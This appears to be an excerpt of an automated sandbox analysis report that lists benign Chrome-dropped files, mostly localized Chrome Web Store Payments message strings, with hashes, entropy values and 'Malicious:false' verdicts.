                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "app_name": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "craw_app_unavailable": {.. "message": "Lietotne pagaid.m nav pieejama.".. },.. "craw_connect_to_network": {.. "message": "L.dzu, izveidojiet savienojumu ar t.klu.".. },.. "iap_unavailable": {.. "message": "Maks.jumi lietotn.s pa.laik nav pieejami.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.dzu, pierakstieties p.rl.k. Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):624
                                                                                                                                                                      Entropy (8bit):4.555032032637389
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:93C459A23BC6953FF744C35920CD2AF9
                                                                                                                                                                      SHA1:162F884972103A08ADB616A7EB3598431A2924C5
                                                                                                                                                                      SHA-256:2CD700AEB57D89C2E73333D0702556EE3FF3863516170F85669BC680FCBDC4E0
                                                                                                                                                                      SHA-512:F76E6E8D8499306883C3EC1E774F7E8BB6B601096DA5A14D17D3E7D5732829542041E42B7350466589291ADCC83FB065FD591B4E20CFCF8EDC586E128ECBFCB5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome Nettmarked-betalinger".. },.. "app_name": {.. "message": "Chrome Nettmarked-betalinger".. },.. "craw_app_unavailable": {.. "message": "Appen er utilgjengelig for .yeblikket.".. },.. "craw_connect_to_network": {.. "message": "Du m. koble til et nettverk.".. },.. "iap_unavailable": {.. "message": "Betaling i app er ikke tilgjengelig for .yeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Du m. logge p. Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):615
                                                                                                                                                                      Entropy (8bit):4.4715318546237315
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:7A8F9D0249C680F64DEC7650A432BD57
                                                                                                                                                                      SHA1:53477198AEE389F6580921B4876719B400A23CA1
                                                                                                                                                                      SHA-256:92BE7C2DC9CFBE5A65E9CE6488D364C8D7EC19E7B67A31E4D43C1CB2B169671C
                                                                                                                                                                      SHA-512:969AB979546A741C0F3EDBEEB21BABA375FA8870D4FB9248CDD4C305736E332E10CAB7B64C5C078E60EC0CD73848101B390BE8F44B89C310058AF4C1CA3C8AA7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Betalingen via Chrome Web Store".. },.. "app_name": {.. "message": "Betalingen via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App momenteel niet beschikbaar.".. },.. "craw_connect_to_network": {.. "message": "Maak verbinding met een netwerk.".. },.. "iap_unavailable": {.. "message": "In-app-betalingen is momenteel niet beschikbaar.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log in bij Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):636
                                                                                                                                                                      Entropy (8bit):4.646901997539488
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:0E6194126AFCCD1E3098D276A7400175
                                                                                                                                                                      SHA1:E8127B905A640B1C46362FA6E1127BE172F4A40F
                                                                                                                                                                      SHA-256:E2699F98C511B18A2AFB82EAE9A4804B646C4FF1077D80E77C17A3943A6373C2
                                                                                                                                                                      SHA-512:A71F7C7BFBBF1E37E699601AF2E095C56CBA91F90CB7556477DF31D01B83ADFB1271E1775C9BA299FF6875BBFC2B6AB47488CC88E33DEF2F6F2E0E5AC687B777
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "app_name": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplikacja jest obecnie niedost.pna.".. },.. "craw_connect_to_network": {.. "message": "Po..cz si. z sieci..".. },.. "iap_unavailable": {.. "message": "P.atno.ci w ramach aplikacji s. teraz niedost.pne.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Zaloguj si. w Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):636
                                                                                                                                                                      Entropy (8bit):4.515158874306633
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:86A2B91FA18B867209024C522ED665D5
                                                                                                                                                                      SHA1:63DEC245637818C76655E01FCB6D59784BC7184E
                                                                                                                                                                      SHA-256:6374880FDD1F8AF1EE8AEA6A06B73BE0AB265AFCEB4FE6F08BDE3B3989264B21
                                                                                                                                                                      SHA-512:DA6DBDE5028756421C2904F605632EE98831A25A1247E6238A931629B94CE8A00FD76F4235F118D2167304BD60F2C06B2AD78E54FF6CE53F8C38DF8C7B5AFCE4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Pagamentos da Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos da Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplicativo indispon.vel no momento.".. },.. "craw_connect_to_network": {.. "message": "Conecte-se a uma rede.".. },.. "iap_unavailable": {.. "message": "No momento, os Pagamentos no aplicativo n.o est.o dispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Fa.a login no Google Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):622
                                                                                                                                                                      Entropy (8bit):4.526171498622949
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:750A4800EDB93FBE56495963F9FB3B94
                                                                                                                                                                      SHA1:8BFB915488A4EB3CB33D68E2E59F1F8447DB7D61
                                                                                                                                                                      SHA-256:C1C94F65FABAF17DEF98A8587711A56D61B1E5607500E9B01F2824DB109F9E83
                                                                                                                                                                      SHA-512:2AEDEF5793406221BE76AF22031CE8C30AB5FAEAED09BB394C153E2EBE990C89C1A2A73B40D8A92842641AFCA8C77FFD808A2058602D3646FD8DAE2844406F24
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Pagamentos via Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplica..o atualmente indispon.vel.".. },.. "craw_connect_to_network": {.. "message": "Ligue-se a uma rede.".. },.. "iap_unavailable": {.. "message": "Os Pagamentos na app est.o atualmente indispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicie sess.o no Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):641
                                                                                                                                                                      Entropy (8bit):4.61125938671415
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:98D43E4B1054A65DF3FA3CC40AB6FB6D
                                                                                                                                                                      SHA1:46E0A21C4DA2BB5D4D8F837AE211C1B6FA26E7E2
                                                                                                                                                                      SHA-256:113A13900CBA62FE8AED06751971C23A80A99B47F9BE219CF884D57DB19611D9
                                                                                                                                                                      SHA-512:A76DC53912A4F46714926B9EA2B22E909540E447F61F6DD72607AB7B3BB5D4A9B39E525B04C33AEC53BA813D14AC1FB5827275B2524E52B693E83171E1CD1466
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "app_name": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "craw_app_unavailable": {.. "message": ".n prezent, aplica.ia nu este disponibil..".. },.. "craw_connect_to_network": {.. "message": "Conecteaz.-te la o re.ea.".. },.. "iap_unavailable": {.. "message": "Pl..ile .n aplica.ie nu sunt disponibile momentan.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Conecteaz.-te la Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):744
                                                                                                                                                                      Entropy (8bit):4.918620852166656
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:DB2EDF1465946C06BD95C71A1E13AE64
                                                                                                                                                                      SHA1:FB4F3ECE9ECECEBBC6CA2A592A15FB9C1FDFB811
                                                                                                                                                                      SHA-256:FBAF22CE6E16DE174CED8CB5EA3098CCA1C3426A2111FF33BD3E64DA64ED67AB
                                                                                                                                                                      SHA-512:4E0CF00BAEF1757548DEB17BBE1AF55770A0A0F7351779EF55C7DEFA6D112D0227B8865C2C22E0EC62E6E2F1C8E1632A2D0CE6828D25C5ABBF143C990116F632
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "......... ....... ........-........ Chrome".. },.. "app_name": {.. "message": "......... ....... ........-........ Chrome".. },.. "craw_app_unavailable": {.. "message": ".......... ...........".. },.. "craw_connect_to_network": {.. "message": "............ . .....".. },.. "iap_unavailable": {.. "message": "....... ..... .......... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "....... . Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):647
                                                                                                                                                                      Entropy (8bit):4.640777810668463
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:8DF215D1EFBDABB175CCDD68ED8DCB0A
                                                                                                                                                                      SHA1:2B374462137A38589A73FDD00A84CBDC7E50F9F4
                                                                                                                                                                      SHA-256:7FA16AF97E6CFC52EC6008EB679D3F30E7E0C24F9EF2D18A9228EAF4DED9D63B
                                                                                                                                                                      SHA-512:C0E623343BDAEB4731800D183B59F2FCFE285F0C7153EC99641FD84F2F2DCFE47D21E73F3D28B1240340453C5668EB0AFFBE087AAB62F1C88CD2A40CC44E599D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplik.cia moment.lne nie je dostupn..".. },.. "craw_connect_to_network": {.. "message": "Pripojte sa k sieti.".. },.. "iap_unavailable": {.. "message": "Platby v aplik.cii moment.lne nie s. k dispoz.cii.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prihl.ste sa do prehliada.a Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):617
                                                                                                                                                                      Entropy (8bit):4.5101656584816885
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:3943FA2A647AECEDFD685408B27139EE
                                                                                                                                                                      SHA1:0129DD19D28373359530B3B477FE8A9279DABB7D
                                                                                                                                                                      SHA-256:18AFF072EE0DF7C3495045435C752A805606E6D5D462EF2321C443F1773F4B3A
                                                                                                                                                                      SHA-512:42E62B3855611FF2E1D39C11404CB1A09825EE4CA6A8ACB3FF538B4574388F549E3BD79137DD4DC128A8DC44DD270D7D878E4AAD20DA8250A5C25297B0DEC09D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "app_name": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenutno ni na voljo.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se z omre.jem.".. },.. "iap_unavailable": {.. "message": "Pla.ila v aplikacijah trenutno niso na voljo.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se v Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):743
                                                                                                                                                                      Entropy (8bit):4.913927107235852
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:D485DF17F085B6A37125694F85646FD0
                                                                                                                                                                      SHA1:24D51D8642CDC6EFD5D8D7A4430232D8CDE25108
                                                                                                                                                                      SHA-256:7FFDE34C58E7C376C042DE64DEF6481DAE32BE8B70F0B18EDF536290CBE0C818
                                                                                                                                                                      SHA-512:0DDECFD860E99290B6C3AAA04F510272AE081CF2D93ED5832D9D6378EC9D36177FFBE213471247FB94721EA34A83E7665669200047091D0FDE134E3D763217E7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "....... . Chrome ...-..........".. },.. "app_name": {.. "message": "....... . Chrome ...-..........".. },.. "craw_app_unavailable": {.. "message": ".......... .. ........ ...........".. },.. "craw_connect_to_network": {.. "message": "........ .. .......".. },.. "iap_unavailable": {.. "message": "....... . .......... .. ........ ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "......... .. . Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):630
                                                                                                                                                                      Entropy (8bit):4.52964089437422
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:D372B8204EB743E16F45C7CBD3CAAF37
                                                                                                                                                                      SHA1:C96C57219D292B01016B37DCF82E7C79AD0DD1E8
                                                                                                                                                                      SHA-256:B8BA77E0089B0676545EC16D32468B727812B444F90B33A7A5B748E6C36C4388
                                                                                                                                                                      SHA-512:33640529E0D5DCC5CA4BDB0615A2818E8D26C6FCB7B3474C08AC3EB67B9DB40E1F0A79954ED20728CD47A686D2533DCBC76ABCBDB917F8530C8DE8BBA687352E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Betalning via Chrome Web Store".. },.. "app_name": {.. "message": "Betalning via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Appen .r inte tillg.nglig f.r tillf.llet.".. },.. "craw_connect_to_network": {.. "message": "Anslut till ett n.tverk.".. },.. "iap_unavailable": {.. "message": "Betalning i appen .r inte tillg.ngligt f.r n.rvarande.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logga in i Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):945
                                                                                                                                                                      Entropy (8bit):4.801079428724355
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:83E2D1E97791A4B2C5C69926EFB629C9
                                                                                                                                                                      SHA1:429600425CB0F196DDD717F940E94DBD8BFF2837
                                                                                                                                                                      SHA-256:2FECA577F43D97BAEEA464741D585892103585208FD0A935B810A03BDCE83C88
                                                                                                                                                                      SHA-512:60A5928DAA8CB4341487F477C56B5A98B83EDE50E5F4F55A802E01FDDAB86F3E795D391953D3D9214552D14D3F58C5A183693C613720FC12FC387D7B8F9B9AB6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "............... Chrome .........".. },.. "app_name": {.. "message": "............... Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".............................".. },.. "craw_connect_to_network": {.. "message": ".........................".. },.. "iap_unavailable": {.. "message": "...............................................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "................. Chrome".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):631
                                                                                                                                                                      Entropy (8bit):4.710869622361971
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:2CEAE0567B6BB1D240BBAD690A98CA3B
                                                                                                                                                                      SHA1:5944346FBD4A0797B13223895995CAB58E9ECD23
                                                                                                                                                                      SHA-256:A7CB86F30C9C31FE5540282C308BA96ADB4EC16EF98C87129EB88105E5BEF5FC
                                                                                                                                                                      SHA-512:108A07C6D03D7178E8D0FFEF5349E0249A898D864964FED8757BD8A08BC1C6D9613F2A6C01AA34A6606127D1C6CE14C229FA02586677DBB060B85E3E845950E1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "app_name": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "craw_app_unavailable": {.. "message": "Uygulama .u anda kullan.lam.yor.".. },.. "craw_connect_to_network": {.. "message": "L.tfen bir a.a ba.lan.n.".. },.. "iap_unavailable": {.. "message": "Uygulama ..i .demeler .u anda kullan.lamaz.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.tfen Chrome'da oturum a..n.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):720
                                                                                                                                                                      Entropy (8bit):4.977397623063544
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:AB0B56120E6B38C42CC3612BE948EF50
                                                                                                                                                                      SHA1:8B3F520E5713D9F116D68E71DAEED1F6E8D74629
                                                                                                                                                                      SHA-256:68ABA284751EB9C856032062EF9B1651E2A1E5CE5FDA0977FFC97D63BA7BED9E
                                                                                                                                                                      SHA-512:CD852A58217F739C1CD58567FF432D31A7AD3F68C884ABBA1DA95799BCD1545C6A5D3B06F319681C12B78AD0A709828DE4B22736316F148D21F5DB76A5BCCBEF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "....... ...-........ Chrome".. },.. "app_name": {.. "message": "....... ...-........ Chrome".. },.. "craw_app_unavailable": {.. "message": "........ ......... ...........".. },.. "craw_connect_to_network": {.. "message": "............. .. .......".. },.. "iap_unavailable": {.. "message": "....... ..... ........ ..... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "........ . Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):695
                                                                                                                                                                      Entropy (8bit):4.855375139026009
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:7EBB677FEAD8557D3676505225A7249A
                                                                                                                                                                      SHA1:F161B4B6001AEAEAB246FF8987F4D992B48D47BE
                                                                                                                                                                      SHA-256:051F96ED874C11C4A13589B5F68964E4F5B03B52DDA223D56524F2CA23760C04
                                                                                                                                                                      SHA-512:74FD267CF7E299FB8E7054605C3F651F057F676FF865082FA24F4916755456768DB0DA62DBC515D829B48AB1F9CFC8AD3E841DCBF1F194D5CB14C5335A192A0D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "app_name": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "craw_app_unavailable": {.. "message": ".ng d.ng hi.n kh.ng kh. d.ng.".. },.. "craw_connect_to_network": {.. "message": "Vui l.ng k.t n.i v.i m.ng.".. },.. "iap_unavailable": {.. "message": "Thanh to.n trong .ng d.ng hi.n kh.ng kh. d.ng.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Vui l.ng ..ng nh.p v.o Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):595
                                                                                                                                                                      Entropy (8bit):5.210259193489374
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:BB73BF561BB79F89D9BF7C67C5AE5C65
                                                                                                                                                                      SHA1:2FADD3A1959B29C44830033A35C637D0311A8C9C
                                                                                                                                                                      SHA-256:D804F2A040D21D7511EFD5213D8E1721D64964A1A0DBB48E21622CEEDC9D967E
                                                                                                                                                                      SHA-512:627D44CEF1FE5C5ABD598BD47FF5E22B9EFC1CF98DDE3868FA9E5896C134A0C9C055AC34EDDADAE56B6690E51AEA89965D38F770552A85C732CC796795DC68D2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome .........".. },.. "app_name": {.. "message": "Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".........".. },.. "craw_connect_to_network": {.. "message": ".......".. },.. "iap_unavailable": {.. "message": "............".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):634
                                                                                                                                                                      Entropy (8bit):5.386215984611281
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:5FF50C673CC0C661D615F0CFD0E6DCA0
                                                                                                                                                                      SHA1:60DFF98DEAB9C4746B288BDD9C94B3BCAE5EAA85
                                                                                                                                                                      SHA-256:C6F8C640F3353A7B9B1432A0C139C1AEEC40133800E6C9B467B63991AD660308
                                                                                                                                                                      SHA-512:361D62D91F4931C5F34092C9F2C6A5323D5EEB82A24E7ABE11F7817D8D66341C0ECAD4DCB4B10873920C8D6A3CC9F5704889E178EB2549001A9F62BEDF6C8019
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome ............".. },.. "app_name": {.. "message": "Chrome ............".. },.. "craw_app_unavailable": {.. "message": ".............".. },.. "craw_connect_to_network": {.. "message": "......".. },.. "iap_unavailable": {.. "message": "................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7780
                                                                                                                                                                      Entropy (8bit):5.791315351651491
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:0834821960CB5C6E9D477AEF649CB2E4
                                                                                                                                                                      SHA1:7D25F027D7CEE9E94E9CBDEE1F9220C8D20A1588
                                                                                                                                                                      SHA-256:52A24FA2FB3BCB18D9D8571AE385C4A830FF98CE4C18384D40A84EA7F6BA7F69
                                                                                                                                                                      SHA-512:9AEAFC3ECE295678242D81D71804E370900A6D4C6A618C5A81CACD869B84346FEAC92189E01718A7BB5C8226E9BE88B063D2ECE7CB0C84F17BB1AF3C5B1A3FC4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiZHUtdGRPdUNWcmxDY254Q0poRkg2NXpLU05vb1RiUE56bDNHbzdRMGJ3SSJ9LHsicGF0aCI6Il9sb2NhbGVzL2NhL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJ6ZGtWaF9XdkxJWlhkck5xWHBvSHNRMGh1ZGtSM2d1QlMzb2VsTEZLNklVIn0seyJwYXRoIjoiX2xvY2FsZXMvY3MvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6Ik9nUkNIZlVoam9xOU93NHFfaEhvTTQxNzNMelJyYkVpUVdsRXNRSzhscFkifSx7InBhdGgiOiJfbG9jYWxlcy9kYS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiN2JVWW1LYkhQUUNRMXBGcmUzTHJySEhwWk9xN1c2Zk5hT0laWmdKUERTTSJ9LHsicGF0aCI6Il9sb2NhbGVzL2RlL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJOV3FkU3Rfc1NFMm9KT2VuSUZtM0pMRm9iOGtBZ3ZTa3RtZGpCRGJWazdBIn0seyJwYXRoIjoiX2xvY2FsZXMvZWwvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6ImgyaEZ0YUJoLXJQUEtoUm00QkFWM0VEZmhFbnh5MElGOVhYT3Z0aHhlNjAifSx7InBhdGgiOiJfbG9jYWxlcy9lbi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoid0pSZDFmM3NxMERFVTJHLXd
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):544643
                                                                                                                                                                      Entropy (8bit):5.385396177420207
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:6EEBED29E6A6301E92A9B8B347807F5F
                                                                                                                                                                      SHA1:65DFB69B650560551110B33DCBA50B25E5B876DE
                                                                                                                                                                      SHA-256:04CD9494B0ED83924DAD12202630B20D053D9E2819C8E826A386C814CC0A1697
                                                                                                                                                                      SHA-512:FEDE6DB31F2AD242E7BC7B52A8859BA7F466A0B920A8DADCB32DCFB5B2A2742E98B767FF22E0C5BC5C11FEC021240AA9E458486C9039EB4EBE5CF6AF7BE97BF2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
